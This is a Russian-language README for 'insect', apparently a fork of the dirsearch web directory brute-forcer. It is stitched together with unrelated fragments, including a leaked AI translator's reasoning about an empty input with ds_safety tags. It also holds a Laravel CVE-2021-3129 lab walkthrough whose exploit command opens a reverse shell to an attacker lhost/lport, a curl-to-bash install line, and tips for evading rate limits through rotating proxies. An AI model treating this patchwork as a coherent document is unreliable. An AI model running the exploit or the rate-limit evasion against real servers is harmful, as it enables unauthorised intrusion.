
Высокопроизводительный инструмент для поиска веб-путей и подбора каталогов. Обнаруживает скрытые файлы, каталоги и конечные точки с помощью настраиваемых списков слов, фильтров и рекурсивного сканирования для тестирования на проникновение.
Текущий релиз: v1.4 (22.09.2022)
Продвинутый инструмент командной строки, предназначенный для подбора директорий и файлов на веб-серверах, также известный как сканер веб-путей.
Идея @maurosoria и @shelld3v
Разработка 2022 года активно ведётся @nu11secur1ty
Требование: Python 3.10.5 или выше
Выберите один из вариантов установки:
git clone https://github.com/nu11secur1ty/insect.git --depth 1 (РЕКОМЕНДУЕТСЯ)docker build -t "insect:latest" . (подробнее здесь)pip3 install dirsearchsudo apt-get install dirsearch (устарело)Краткое описание:
%EXT% на расширения из флага -e.%EXT% (например, SecLists) необходимо использовать ключ -f | --force-extensions, чтобы добавить расширения к каждому слову в словнике, а также к /.wordlist1.txt,wordlist2.txt.Примеры:
Передача **asp** и **aspx** в качестве расширений сгенерирует следующий словарь:```
index
index.asp
index.aspx
Передача расширений **php** и **html** с флагом **-f**/**--force-extensions** сгенерирует следующий словарь:```
admin
admin.php
admin.html
admin/
Передача расширений **jsp** и **jspa** с флагом **-O**/**--overwrite-extensions** приведёт к созданию следующего словаря:```
login.html
login.jsp
login.jspa
Параметры -------``` Usage: insect.py [-u|--url] target [-e|--extensions] extensions [options]
Options: --version show program's version number and exit -h, --help show this help message and exit
Mandatory:
-u URL, --url=URL Target URL(s), support multiple flags
-l PATH, --url-file=PATH
URL list file
--stdin Read URL(s) from STDIN
--cidr=CIDR Target CIDR
--raw=PATH Load raw HTTP request from file (use --scheme flag
to set the scheme)
-s SESSION_FILE, --session=SESSION_FILE
Session file
--config=PATH Full path to config file, see 'config.ini' for
example (Default: config.ini)
Dictionary Settings:
-w WORDLISTS, --wordlists=WORDLISTS
Customize wordlists (separated by commas)
-e EXTENSIONS, --extensions=EXTENSIONS
Extension list separated by commas (e.g. php,asp)
-f, --force-extensions
Add extensions to the end of every wordlist entry. By
default insect only replaces the %EXT% keyword with
extensions
-O, --overwrite-extensions
Overwrite other extensions in the wordlist with your
extensions (selected via -e)
--exclude-extensions=EXTENSIONS
Exclude extension list separated by commas (e.g.
asp,jsp)
--remove-extensions
Remove extensions in all paths (e.g. admin.php ->
admin)
--prefixes=PREFIXES
Add custom prefixes to all wordlist entries (separated
by commas)
--suffixes=SUFFIXES
Add custom suffixes to all wordlist entries, ignore
directories (separated by commas)
-U, --uppercase Uppercase wordlist
-L, --lowercase Lowercase wordlist
-C, --capital Capital wordlist
General Settings: -t THREADS, --threads=THREADS Number of threads -r, --recursive Brute-force recursively --deep-recursive Perform recursive scan on every directory depth (e.g. api/users -> api/) --force-recursive Do recursive brute-force for every found path, not only directories -R DEPTH, --max-recursion-depth=DEPTH Maximum recursion depth --recursion-status=CODES Valid status codes to perform recursive scan, support ranges (separated by commas) --subdirs=SUBDIRS Scan sub-directories of the given URL[s] (separated by commas) --exclude-subdirs=SUBDIRS Exclude the following subdirectories during recursive scan (separated by commas) -i CODES, --include-status=CODES Include status codes, separated by commas, support ranges (e.g. 200,300-399) -x CODES, --exclude-status=CODES Exclude status codes, separated by commas, support ranges (e.g. 301,500-599) --exclude-sizes=SIZES Exclude responses by sizes, separated by commas (e.g. 0B,4KB) --exclude-texts=TEXTS Exclude responses by texts, separated by commas (e.g. 'Not found', 'Error') --exclude-regex=REGEX Exclude responses by regex (e.g. '^Error$') --exclude-redirect=STRING Exclude responses if this regex (or text) matches redirect URL (e.g. '/index.html') --exclude-response=PATH Exclude responses similar to response of this page, path as input (e.g. 404.html) --skip-on-status=CODES Skip target whenever hit one of these status codes, separated by commas, support ranges --min-response-size=LENGTH Minimum response length --max-response-size=LENGTH Maximum response length --max-time=SECONDS Maximum runtime for the scan
Request Settings: -m METHOD, --http-method=METHOD HTTP method (default: GET) -d DATA, --data=DATA HTTP request data --data-file=PATH File contains HTTP request data -H HEADERS, --header=HEADERS HTTP request header, support multiple flags --header-file=PATH File contains HTTP request headers -F, --follow-redirects Follow HTTP redirects --random-agent Choose a random User-Agent for each request --auth=CREDENTIAL Authentication credential (e.g. user:password or bearer token) --auth-type=TYPE Authentication type (basic, digest, bearer, ntlm, jwt, oauth2) --cert-file=PATH File contains client-side certificate --key-file=PATH File contains client-side certificate private key (unencrypted) --user-agent=USERAGENT --cookie=COOKIE
Connection Settings: --timeout=TIMEOUT Connection timeout --delay=DELAY Delay between requests --proxy=PROXY Proxy URL, support HTTP and SOCKS proxies (e.g. localhost:8080, socks5://localhost:8088) --proxy-file=PATH File contains proxy servers --proxy-auth=CREDENTIAL Proxy authentication credential --replay-proxy=PROXY Proxy to replay with found paths --tor Use Tor network as proxy --scheme=SCHEME Scheme for raw request or if there is no scheme in the URL (Default: auto-detect) --max-rate=RATE Max requests per second --retries=RETRIES Number of retries for failed requests --ip=IP Server IP address --exit-on-error Exit whenever an error occurs
Advanced Settings: --crawl Crawl for new paths in responses
View Settings: --full-url Full URLs in the output (enabled automatically in quiet mode) --redirects-history Show redirects history --no-color No colored output -q, --quiet-mode Quiet mode
Output Settings: -o PATH, --output=PATH Output file --format=FORMAT Report format (Available: simple, plain, json, xml, md, csv, html, sqlite) --log=PATH Log file
Конфигурация
---------------
Значения по умолчанию для флагов dirsearch и insect можно редактировать в файле конфигурации, по умолчанию это `config.ini`, но вы можете выбрать другой файл с помощью флага `--config`.```ini
# If you want to edit dirsearch or insect default configurations, you can
# edit values in this file. Everything after `#` is a comment
# and won't be applied
[general]
threads = 25
recursive = False
deep-recursive = False
force-recursive = False
recursion-status = 200-399,401,403
max-recursion-depth = 0
exclude-subdirs = %%ff/,.;/,..;/,;/,./,../,%%2e/,%%2e%%2e/
random-user-agents = False
max-time = 0
# subdirs = /,api/
# include-status = 200-299,401
# exclude-status = 400,500-999
# exclude-sizes = 0b,123gb
# exclude-texts = "Not found"
# exclude-regex = "^403$"
# exclude-redirect = "*/error.html"
# exclude-response = 404.html
# skip-on-status = 429,999
[dictionary]
default-extensions = php,aspx,jsp,html,js
force-extensions = False
overwrite-extensions = False
lowercase = False
uppercase = False
capitalization = False
# exclude-extensions = old,log
# prefixes = .,admin
# suffixes = ~,.bak
# wordlists = /path/to/wordlist1.txt,/path/to/wordlist2.txt
[request]
httpmethod = get
follow-redirects = False
# headers-file = /path/to/headers.txt
# user-agent = MyUserAgent
# cookie = SESSIONID=123
[connection]
timeout = 7.5
delay = 0
max-rate = 0
max-retries = 1
exit-on-error = False
## By disabling `scheme` variable, insect will automatically identify the URI scheme
# scheme = http
# proxy = localhost:8080
# proxy-file = /path/to/proxies.txt
# replay-proxy = localhost:8000
[advanced]
crawl = False
[view]
full-url = False
quiet-mode = False
color = True
show-redirects-history = False
[output]
## Support: plain, simple, json, xml, md, csv, html, sqlite
report-format = plain
autosave-report = True
# log-file = /path/to/insect.log
# report-output-folder = /path/to/reports

Некоторые примеры использования dirsearch и insect - это наиболее распространённые аргументы. Если вам нужны все, просто используйте аргумент -h.
python3 insect.py -u https://target
method was first implemented in FileReader's chunk reading. The approach
is simple: use non-blocking main loop + pass events to `thread_execute` to
allow blocking operations in a thread pool.
### Хэш файла / Получение контрольной суммы
Hash file dialog shows multiple algorithms to choose from and after
checksum is calculated user can save it to file or copy to clipboard.

### Расположение
По умолчанию `autostart.sh`, содержащийся в установочном архиве .tar.xz,
размещается в `~/.config/sunflower/`. Также возможно использовать
общесистемное или пользовательское расположение для конфигурации,
в таком случае измените скрипт `sunflower`, чтобы он указывал альтернативный путь.```
python3 insect.py -e php,html,js -u https://target
build: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - name: "Setup Go" uses: actions/setup-go@v5 with: go-version: '1.22.x' - name: "Setup Mage" run: go run mage.go -v - name: "Run Tests" run: mage -v test:coverage - name: Upload coverage to Codecov uses: codecov/codecov-action@v5 with: token: ${{ secrets.CODECOV_TOKEN }} files: "${{ env.COVERAGE_OUTPUT }}" verbose: true
#.github/workflows/test-system.yaml
[...]
Системные тесты Системные тесты запускаются каждую ночь с использованием матрицы комбинаций ОС/дистрибутив/провайдер. Все комбинации можно запустить локально с помощью команд: export VAGRANT_LIBVIRT_VIRT_SYSPREP_OPERATIONS="defaults,flag-reconfiguration" vagrant up --no-destroy-on-error --provider=libvirt [...] Полная матрица тестов определена https://github.com/roidelapluie/vagrant-libvirt/blob/main/.github/workflows/test-system.yaml[здесь].``` python3 insect.py -e php,html,js -u https://target -w /path/to/wordlist
---
### Приостановка прогресса
dirsearch и insect позволяют приостановить процесс сканирования с помощью CTRL+C. Отсюда вы можете сохранить прогресс (и продолжить позже), пропустить текущую цель или пропустить текущий подкаталог.
<img src="https://assets.kitploit.com/production/public/readmes/42137/d4cf979db78841d0c0f16abb177e5084211820c23e8adaf587f0bb3faf0e25b4.png" alt="Приостановка insect" width="475px">
----
### Рекурсия
- Рекурсивный брутфорс — это непрерывный брутфорс найденных директорий. Например, если insect находит `admin/`, он будет брутфорсить `admin/*` (`*` — это место, где выполняется брутфорс). Чтобы включить эту функцию, используйте флаг **-r** (или **--recursive**).```
python3 insect.py -e php,html,js -u https://target -r
- Есть еще 2 опции: **--force-recursive** и **--deep-recursive**
- **Force recursive**: Рекурсивный перебор всех найденных путей, а не только тех, что заканчиваются на `/`
- **Deep recursive**: Рекурсивный перебор всех уровней вложенности пути (`a/b/c` => добавлять `a/`, `a/b/`)
- Если есть поддиректории, которые вы не хотите перебирать рекурсивно, используйте `--exclude-subdirs````
python3 insect.py -e php,html,js -u https://target -r --exclude-subdirs image/,media/,css/
Номер потока (-t | --threads) отражает количество отдельных процессов перебора. И чем больше номер потока, тем быстрее работают dirsearch или insect. По умолчанию количество потоков равно 25, но вы можете увеличить его, если хотите ускорить процесс.
Несмотря на это, скорость все еще сильно зависит от времени ответа сервера. И в качестве предупреждения мы советуем не делать количество потоков слишком большим, так как это может вызвать DoS (Отказ в обслуживании).``` python3 insect.py -e php,htm,js,bak,zip,tgz,txt -u https://target -t 20
----
### Префиксы / Суффиксы
- **--prefixes**: Добавить пользовательские префиксы ко всем записям```
python3 insect.py -e php -u https://target --prefixes .,admin,_
Список слов:``` tools
Сгенерировано с префиксами:```
tools
.tools
admintools
_tools
Список слов:```
index.php
internal
Сгенерировано с суффиксами:``` index.php internal index.php~ internal~
----
### Blacklist
В папке `db/` находятся несколько «файлов черного списка». Пути из этих файлов будут отфильтрованы из результатов сканирования, если они имеют тот же статус, который указан в имени файла.
Пример: если вы добавите `admin.php` в `db/403_blacklist.txt`, то при сканировании, когда `admin.php` возвращает 403, он будет отфильтрован из результата.
----
### Фильтры
Используйте **-i | --include-status** и **-x | --exclude-status** для выбора разрешенных и запрещенных кодов статуса ответа.
Для более продвинутых фильтров: **--exclude-sizes**, **--exclude-texts**, **--exclude-regexps**, **--exclude-redirects** и **--exclude-response**```
python3 insect.py -e php,html,js -u https://target --exclude-sizes 1B,243KB
<ds_safety>用户输入仅包含'INPUT:'字符串,无任何实际内容,不涉及任何政治敏感话题。</ds_safety>Safe
But wait, the user message is:
"Translate the following Kitploit tool content.
This is chunk 45 of 91 from a longer Markdown document being translated in sequence.
The source language is en.
Target language: ru.
Content type: README chunk 45/91.
[chunk-specific rules...]
INPUT:"
Then the message ends with "INPUT:" and nothing after? Actually, I see the prompt says "INPUT:" and then a blank line? The user only provided "INPUT:" and no actual content. But then the assistant said "response<ds_safety>用户输入仅包含'INPUT:'字符串,无任何实际内容,不涉及任何政治敏感话题。</ds_safety>Safe". That seems like the assistant's internal safety check. But I need to produce a response. According to the guidelines: "Return ONLY the translated text. No preamble, no commentary..." But there's no text to translate. The chunk is empty. I need to respond with nothing? But the assistant's response includes that safety tag, but maybe I should just translate the "INPUT:"? No, the chunk is the text after "INPUT:". Since there's nothing after "INPUT:", the chunk content is empty. So I should just output nothing? But the instruction says "DO NOT add any leading newline or indent unless it exists in the source." The source might be just an empty string. But the assistant's safety analysis is not part of my output. I should output nothing, or maybe the word "INPUT:" is the content? But "INPUT:" is likely a marker, not the content. The actual chunk is missing. The user may have intended to include the chunk, but forgot. As an AI, I need to respond as the translation tool: if there's no content, I translate nothing, so I output an empty string. However, the prompt explicitly states "Return ONLY the translated text." So if there's nothing to translate, I should return an empty response. However, I must avoid adding any commentary. So I'll output an empty string. But the assistant's response includes "<ds_safety>..." That is a meta-response. But my task is to provide the translation, not the safety check. The provided example response in the user's message includes the safety tag? Actually, the user's message after "INPUT:" includes "response<ds_safety>用户输入仅包含'INPUT:'字符串,无任何实际内容,不涉及任何政治敏感话题。</ds_safety>Safe". Wait, the user's input itself might be including that response? Let me re-read the user's message:
The user message starts with "Translate the following Kitploit tool content. ..." and then after the rules, it says "INPUT:" and then on the next line, it shows "response<ds_safety>用户输入仅包含'INPUT:'字符串,无任何实际内容,不涉及任何政治敏感话题。</ds_safety>Safe". That is confusing. The user might have copy-pasted a previous interaction. Actually, the user might have accidentally included a safety check output as the content. I think the chunk is actually that text: "response<ds_safety>用户输入仅包含'INPUT:'字符串,无任何实际内容,不涉及任何政治敏感话题。</ds_safety>Safe". But that seems unlikely. The user is providing a chunk of a README to translate. Could the chunk be that exact string? Probably not. The user says "This is chunk 45 of 91 from a longer Markdown document" and then "INPUT:" followed by a line with "response<ds_safety>...". I need to interpret that as the chunk content. The chunk content is: "response<ds_safety>用户输入仅包含'INPUT:'字符串,无任何实际内容,不涉及任何政治敏感话题。</ds_safety>Safe". That looks like an assistant safety check. But that content is not in English, it's in Chinese and includes a string. According to the translation rules, I should translate natural language text to Russian. The chunk might be a text snippet that contains a mix of tags and Chinese text. I'll translate the Chinese part to Russian, preserving all tags. The tag "<ds_safety>..." is an XML-like tag, I should preserve it exactly. The content inside is Chinese: "用户输入仅包含'INPUT:'字符串,无任何实际内容,不涉及任何政治敏感话题。" I'll translate that to Russian and keep the tags. So the translation would be: "response<ds_safety>Пользовательский ввод содержит только строку 'INPUT:', никакого фактического содержимого, не затрагивает политически чувствительных тем.</ds_safety>Safe". The "Safe" at the end might be part of the text, not a tag; I'll keep it as is. But is that really the chunk? The user says "content type: README chunk 45/91" but then gives this odd text. That seems like a mistake. I'll assume that the chunk is indeed that text. I'll translate the Chinese within the safety tag to Russian, and leave the structure intact. I'll output exactly that translation with no preamble.
But I should verify: the user message ends with "INPUT:" then newline, then "response<ds_safety>...". That is the content after "INPUT:". So the chunk is "response<ds_safety>用户输入仅包含'INPUT:'字符串,无任何实际内容,不涉及任何政治敏感话题。</ds_safety>Safe". So yes, I'll translate the Chinese text to Russian. The Chinese text: "用户输入仅包含'INPUT:'字符串,无任何实际内容,不涉及任何政治敏感话题。" I'll translate: "Пользовательский ввод содержит только строку 'INPUT:', никакого фактического содержимого, не затрагивает политически чувствительных тем." I'll wrap it in the tags. Then "Safe" remains. So final: "response<ds_safety>Пользовательский ввод содержит только строку 'INPUT:', никакого фактического содержимого, не затрагивает политически чувствительных тем.</ds_safety>Safe"
I'll output that.<ds_safety>Пользовательский ввод содержит только строку 'INPUT:', никакого фактического содержимого, не затрагивает политически чувствительных тем.</ds_safety>Safe```
python3 insect.py -e php,html,js -u https://target --exclude-texts "403 Forbidden"
47``` python3 insect.py -e php,html,js -u https://target --exclude-regexps "^Error$"
[...]
Настройте определённые приложения для использования прокси, некоторые приложения используют Android System WebView, ProxyOn! не может проксировать их запросы, в этом случае либо используйте браузер с поддержкой прокси, такой как Firefox, либо измените настройки прокси устройства через adb.```
python3 insect.py -e php,html,js -u https://target --exclude-redirects "https://(.*).okta.com/*"
sfilter.mount(): Ожидает, пока монтирование раздела целевого диска с агентом расширения загрузится в компонент и активно выполняется.
Эта функция необходима для того, чтобы дождаться полной загрузки агента расширения перед выполнением любых других операций. Любые обратные вызовы событий от расширения, вызванные монтированием, будут обработаны до того, как эта функция вернёт управление.
Эта функция возвращается немедленно, если целевой раздел уже монтируется. Обратный вызов `on_event` будет вызван только один раз во время одного монтирования, даже при наличии параллельных вызывающих. Если компонент предназначен для работы с временными монтированиями, то эта функция может недетерминированно пропустить монтирование, если только `sfilter.target()` не была вызвана до фактического монтирования.
- *Синтаксис*: `sfilter.mount(callback)`
- *Параметры*:
- `callback: function`: Обратный вызов, который вызывается после загрузки агента расширения.
- *Возвращает*: Ничего.
- *Параметры обратного вызова*:
- `event: object`:
- `details: object`:
- `target_path: string` - Путь к разделу, который был смонтирован.
- `drive_type: number` - Тип смонтированного раздела. Разделы могут быть классифицированы как жёсткий диск (`volume_type == 0`), USB (`volume_type == 1`) и сетевая папка (`volume_type == 2`).```
python3 insect.py -e php,html,js -u https://target --exclude-response /error.html
### Raw request
dirsearch или insect позволяют импортировать сырой запрос из файла. Содержимое будет выглядеть примерно так:```http
GET /admin HTTP/1.1
Host: admin.example.com
Cache-Control: max-age=0
Accept: */*
Поскольку у dirsearch или insect нет способа узнать, что такое схема URI, вам нужно установить её с помощью флага --scheme. По умолчанию dirsearch и insect автоматически определяют схему.
Поддерживаемые форматы списков слов: верхний регистр, нижний регистр, капитализация
admin index.html
#### Верхний регистр:```
ADMIN
INDEX.HTML
Admin Index.html
### Исключить расширения
Используйте **-X | --exclude-extensions** со списком расширений, чтобы удалить все пути в списке слов, содержащие указанные расширения
`python3 insect.py -u https://target -X jsp`
Список слов:```
admin.php
test.jsp
После:``` admin.php
----
### Сканирование подкаталогов
- С URL-адреса можно отсканировать список подкаталогов с помощью **--subdirs**.```
python3 insect.py -e php,html,js -u https://target --subdirs /,admin/,folder/
dirsearch и insect поддерживают SOCKS и HTTP прокси, с двумя вариантами: прокси-сервер или список прокси-серверов.``` python3 insect.py -e php,html,js -u https://target --proxy 127.0.0.1:8080
We can also supply a comma-separated list of extra features to require, `tools/advanced/Options/extra_requirements.csv` (see section "Feature-Based Templates").
<div style="height:200px; overflow-y:scroll; -webkit-overflow-scrolling:touch;">
```csv
Feature,Value
FeatureA,This must be present
FeatureB,This must also be present
The format X: Y can also be used, for the list and also for the value, separated by a new line. This allows multiline descriptions.
X: Y
X: Y
Values can be true/false booleans to describe features that are just required or not:
Feature,Value
FeatureA,true
FeatureB,false
You can also ignore extra_requirements.csv during generation and just rely on the --feature option: `--features=FeatureA:true,FeatureB:"This must also be present"````
python3 insect.py -e php,html,js -u https://target --proxy socks5://10.10.0.1:8080
<h2 id="vulnerable-apps-and-services-to-test">Уязвимые приложения и сервисы для тестирования</h2>
<p>Курированный список <em>намеренно уязвимых</em> приложений и сервисов для оттачивания навыков:</p>
<hr />
<p><strong>Мобильное приложение</strong></p>
<ul>
<li><strong><a href="https://github.com/optiv/InsecureShop">InsecureShop</a></strong> - Намеренно уязвимое Android-приложение.</li>
<li><strong><a href="https://github.com/b3nac/InjuredAndroid">InjuredAndroid</a></strong> - Уязвимое Android-приложение в стиле CTF.</li>
<li><strong><a href="https://github.com/oversecured/ovaa">Oversecured Vulnerable Android App (OVAA)</a></strong> - Уязвимое Android-приложение.</li>
<li><strong><a href="https://github.com/dineshshetty/Android-InsecureBankv2">InsecureBankv2</a></strong> - Уязвимое Android-приложение.</li>
<li><strong><a href="https://github.com/OWASP/DVSA">OWASP DVSA (Damn Vulnerable Serverless Application)</a></strong> - Чертовски уязвимое бессерверное приложение.</li>
</ul>
<p><strong>Веб-приложение</strong></p>
<ul>
<li><strong><a href="https://github.com/bkimminich/juice-shop">Juice Shop</a></strong> - Современное и сложное небезопасное веб-приложение.</li>
<li><strong><a href="https://github.com/digininja/DVWA">DVWA</a></strong> - Чертовски уязвимое веб-приложение.</li>
<li><strong><a href="https://github.com/WebGoat/WebGoat">WebGoat</a></strong> - Намеренно небезопасное веб-приложение.</li>
<li><strong><a href="https://github.com/rapid7/hackazon">hackazon</a></strong> - Современное уязвимое веб-приложение.</li>
<li><strong><a href="https://github.com/commjoen/Gatormail">Gatormail</a></strong> - Уязвимое приложение веб-почты.</li>
<li><strong><a href="https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application">Damn Vulnerable GraphQL Application</a></strong> - Чертовски уязвимое приложение GraphQL.</li>
<li><strong><a href="https://github.com/nVisium/django.nV">django.nV</a></strong> - Уязвимое приложение Django.</li>
<li><strong><a href="https://github.com/WangYihang/Weblogic-Framework">Weblogic-Framework</a></strong> - Уязвимая среда Weblogic.</li>
<li><strong><a href="https://github.com/jerryhoff/WebGoat.NET">WebGoat.NET</a></strong> - .NET-версия WebGoat.</li>
<li><strong><a href="https://github.com/WebGoat/WebGoat.NETCore">WebGoat.NETCore</a></strong> - WebGoat, портированный на .NET Core.</li>
<li><strong><a href="https://github.com/nickboucher/trojan-source">Trojan-Source</a></strong> - Невидимые уязвимости.</li>
</ul>
<p><strong>API</strong></p>
<ul>
<li><strong><a href="https://github.com/erev0s/VAmPI">VAmPI</a></strong> - Уязвимый REST API с уязвимостями из OWASP Top 10.</li>
<li><strong><a href="https://github.com/roottusk/vapi">vAPI</a></strong> - vAPI — это уязвимый интерфейс, программируемый со злым умыслом (Adversely Programmed Interface), представляющий собой саморазвертываемый API, который имитирует сценарии OWASP API Top 10 в виде упражнений.</li>
<li><strong><a href="https://github.com/imperva/dvws">Damn Vulnerable Web Sockets (DVWS)</a></strong> - Чертовски уязвимые веб-сокеты.</li>
<li><strong><a href="https://github.com/crapi/crapi">crAPI</a></strong> - совершенно нелепый API (crAPI).</li>
</ul>
<p><strong>Бессерверные / Облачные</strong></p>
<ul>
<li><strong><a href="https://github.com/OWASP/DVSA">OWASP DVSA (Damn Vulnerable Serverless Application)</a></strong> - Чертовски уязвимое бессерверное приложение.</li>
<li><strong><a href="https://github.com/nickriccobono/awsome-vulnerable-cloud">AWSOME-Vulnerable-Cloud</a></strong> - Уязвимое облако AWS Omnipresent Mechanical Cloud Emulation.</li>
<li><strong><a href="https://github.com/RhinoSecurityLabs/cloudgoat">CloudGoat</a></strong> - Инструмент развертывания AWS, уязвимый по замыслу.</li>
<li><strong><a href="https://github.com/OWASP/Serverless-Goat">OWASP Serverless-Goat</a></strong> - Уязвимое бессерверное приложение.</li>
<li><strong><a href="https://github.com/acantril/learn-cantrill-io-labs">cloudsplaining</a></strong> - Генератор, аудитор и монитор политик наименьших привилегий AWS IAM.</li>
<li><strong><a href="https://github.com/sethsec-bf/vulnerable-lambda">Vulnerable-Lambda</a></strong> - Приложение AWS Lambda, уязвимое для угроз из OWASP Top 10.</li>
</ul>
<p><strong>Контейнеры</strong></p>
<ul>
<li><strong><a href="https://github.com/nodydude/ccs">Container Compliance Sandbox</a></strong> - Песочница проверки соответствия контейнеров.</li>
<li><strong><a href="https://github.com/avishayil/cdk-goat">CDK Goat</a></strong> - Уязвимая инфраструктура AWS CDK.</li>
<li><strong><a href="https://github.com/madhuakula/kubernetes-goat">Kubernetes Goat</a></strong> - Кластер Kubernetes, уязвимый по замыслу.</li>
</ul>
<hr />```
python3 insect.py -e php,html,js -u https://target --proxylist proxyservers.txt
Поддерживаемые форматы отчётов: simple, plain, json, xml, md, csv, html, sqlite``` python3 insect.py -e php -l URLs.txt --format plain -o report.txt
> Это программное обеспечение предназначено только для образовательных целей и авторизованных оценок безопасности. Используйте ответственно и в соответствии с действующим законодательством.```
python3 insect.py -e php -u https://target --format html -o target.json
cat urls.txt | python3 insect.py --stdin
[На японском](https://github.com/tiimgreen/github-cheat-sheet/blob/master/README.ja.md), [한국어](https://github.com/tiimgreen/github-cheat-sheet/blob/master/README.ko.md), [Китайский](https://github.com/tiimgreen/github-cheat-sheet/blob/master/README.zh-cn.md), [Немецкий](https://github.com/tiimgreen/github-cheat-sheet/blob/master/README.de.md), [Вики-ссылки в GitHub](https://github.com/tiimgreen/github-cheat-sheet/blob/master/README.wiki.md), на [Персидском](https://github.com/tiimgreen/github-cheat-sheet/blob/master/README.fa.md)```
python3 insect.py -u https://target --max-time 360
Для показанной(ых) команды(команд) замените .laravel на правильный рабочий каталог. Если это так, cookie хранится в файле .env, который должен быть доступен через LFI.
Всё вышеперечисленное не относится к утечке информации режима отладки Laravel.
То же самое относится и к пути панели.
Примечание: имя cookie по умолчанию —
laravel_session.
Name: laravel_session Value: должно быть значением сессии, например, eyJpdic...
Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/laravel/laravel-debug-mode-info-leaked.yaml
Шаблон Nuclei предназначен только для обнаружения, нам нужно проверить исходный HTML самостоятельно.
Решение:
Найдите цель(и), уязвимую к утечке информации режима отладки Laravel. Затем перейдите на страницу входа.
Перехватите запрос, затем отправьте в Repeater в Burp Suite.
Измените метод с GET на POST, удалите ненужный(е) заголовок(ки),
затем добавьте в запрос следующую строку:
application_key=SomeRandomString&password=SomeRandomString&email=SomeRandomString
После отправки запроса цель возвращает 419 Session Expired. Это потому, что мы не предоставили CSRF-токен.
Но нам не нужно беспокоиться, так как режим отладки включен.
Поэтому прокрутите HTML-ответ вниз, там будет раздел
Session Attributes. Он содержит информацию о cookie.
В таблице Session Attributes вы увидите ключ url
со значением ..... Это значение — предполагаемый URL
до возникновения ошибки.
Добавьте значение ключа url в качестве нового заголовка X-Forwarded-Path
в тот же POST запрос, который вы использовали ранее, например:
X-Forwarded-Path: /_ignition/health-check
Переписано из https://raw.githubusercontent.com/ally-petitt/CVE-2021-3129/main/CVE-2021-3129-pares.py
Name: XSRF-TOKEN
Value: скопируйте значение из ответа, называемое laravel_session.
Name: laravel_session
Value: скопируйте значение из ответа, называемое laravel_session.
Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3129.yaml
Решение:
В файле ~/CVE-2021-3129.py находится скрипт эксплуатации. Это просто
модифицированная версия pares.py, адаптированная под лабораторную среду.
Прочитайте скрипт, поймите, как он работает, затем запустите его.
python3 ~/CVE-2021-3129.py --rhost <target address> --lhost <tun0 IP> --lport 9001
Как работает уязвимость?
Из-за ошибки в коде функции
makeOptionalв классеCompilesPhpEchoпользовательский ввод (application_key) не фильтруется должным образом, что позволяет внедрить PHP-код и выполнить RCE.``` python3 insect.py -u https://target --auth admin:pass --auth-type basic
- [Введение](#introduction)
- [Возможности](#features)
- [Установка](#installation)
- [Использование](#usage)
- [Расширенное использование](#advanced-usage)
- [Результаты сканирования](#scan-results)
- [Извлечение URL из исходного кода](#extracting-urls-from-source-code)
- [Анализ JavaScript-файлов](#analyzing-javascript-files)
- [Поиск конечных точек](#finding-endpoints)
- [Обнаружение параметров](#detecting-parameters)
- [Идентификация API-точек](#identifying-api-endpoints)
- [Конфигурация](#configuration)
- [FAQ](#faq)
- [Вклад](#contribution)
- [Лицензия](#license)```
python3 insect.py -u https://target --header-list rate-limit-bypasses.txt
Есть еще много интересного, попробуйте сами!
Установка Docker```sh curl -fsSL https://get.docker.com | bash
> Чтобы использовать docker, вам нужны права суперпользователя
### Собрать образ dirsearch на insect
Чтобы создать образ```sh
docker build -t "dirsearch:v0.4.2" .
docker build -t "insect:latest" .
dirsearch — это имя образа, а v0.4.2 — версия
insect — это имя образа, а latest — версия
Для использования```sh docker run -it --rm "insect:latest" -u target -e php,html,js,zip
References
---------------
- [Полное руководство по Dirsearch](https://www.hackingarticles.in/comprehensive-guide-on-dirsearch/) от Shubham Sharma
- [Полное руководство по Dirsearch, часть 2](https://www.hackingarticles.in/comprehensive-guide-on-dirsearch-part-2/) от Shubham Sharma
- [Как найти скрытые веб-каталоги с помощью Dirsearch](https://www.geeksforgeeks.org/how-to-find-hidden-web-directories-with-dirsearch/) от GeeksforGeeks
- [ПОЛНОЕ РУКОВОДСТВО ПО ИСПОЛЬЗОВАНИЮ DIRSEARCH](https://esgeeks.com/guia-completa-uso-dirsearch/?feed_id=5703&_unique_id=6076249cc271f) от ESGEEKS
- [Как использовать Dirsearch для обнаружения веб-каталогов](https://www.ehacking.net/2020/01/how-to-find-hidden-web-directories-using-dirsearch.html) от EHacking
- [Как пользоваться dirsearch](https://vk9-sec.com/dirsearch-how-to/) от VK9 Security
- [Найдите скрытые веб-каталоги с помощью Dirsearch](https://null-byte.wonderhowto.com/how-to/find-hidden-web-directories-with-dirsearch-0201615/) от Wonder How To
- [Подбор каталогов и файлов на веб-серверах с помощью dirsearch](https://upadhyayraj.medium.com/brute-force-directories-and-files-in-webservers-using-dirsearch-613e4a7fa8d5) от Raj Upadhyay
- [Живая сессия разведки баунти-багов на Yahoo (Amass, crts.sh, dirsearch) с @TheDawgyg](https://www.youtube.com/watch?v=u4dUnJ1U0T4) от Nahamsec
- [Dirsearch для поиска скрытых веб-каталогов](https://medium.com/@irfaanshakeel/dirsearch-to-find-hidden-web-directories-d0357fbe47b0) от Irfan Shakeel
- [Получение доступа к данным 25 000 сотрудников](https://medium.com/@ehsahil/getting-access-to-25k-employees-details-c085d18b73f0) от Sahil Ahamad
- [Лучшие инструменты для подбора каталогов](https://secnhack.in/multiple-ways-to-find-hidden-directory-on-web-server/) от Shubham Goyal
- [Обнаружение скрытых файлов и каталогов на веб-сервере — полное руководство по dirsearch](https://www.youtube.com/watch?v=jVxs5at0gxg) от CYBER BYTES
- [Пример поиска слабо защищённых каталогов с помощью insect](https://www.nu11secur1ty.com/2022/09/wordpress-all-in-one-wp-migration-764.html) от nu11secur1ty
Tips
---------------
- На сервере есть ограничение на количество запросов? Это плохо, но вы можете легко обойти его, рандомизируя прокси с помощью `--proxy-list`
- Хотите найти конфигурационные файлы или резервные копии? Попробуйте `--suffixes ~` и `--prefixes .`
- Нужны только папки/каталоги? Почему бы не объединить `--remove-extensions` и `--suffixes /`!
- Комбинация `--cidr`, `-F`, `-q` позволит уменьшить большую часть шума и ложноотрицательных результатов при подборе по CIDR
- Сканируете список URL, но не хотите видеть поток 429? `--skip-on-status 429` поможет пропустить цель, как только она вернёт 429
- Сервер содержит большие файлы, замедляющие сканирование? Возможно, вам стоит использовать HTTP-метод `HEAD` вместо `GET`
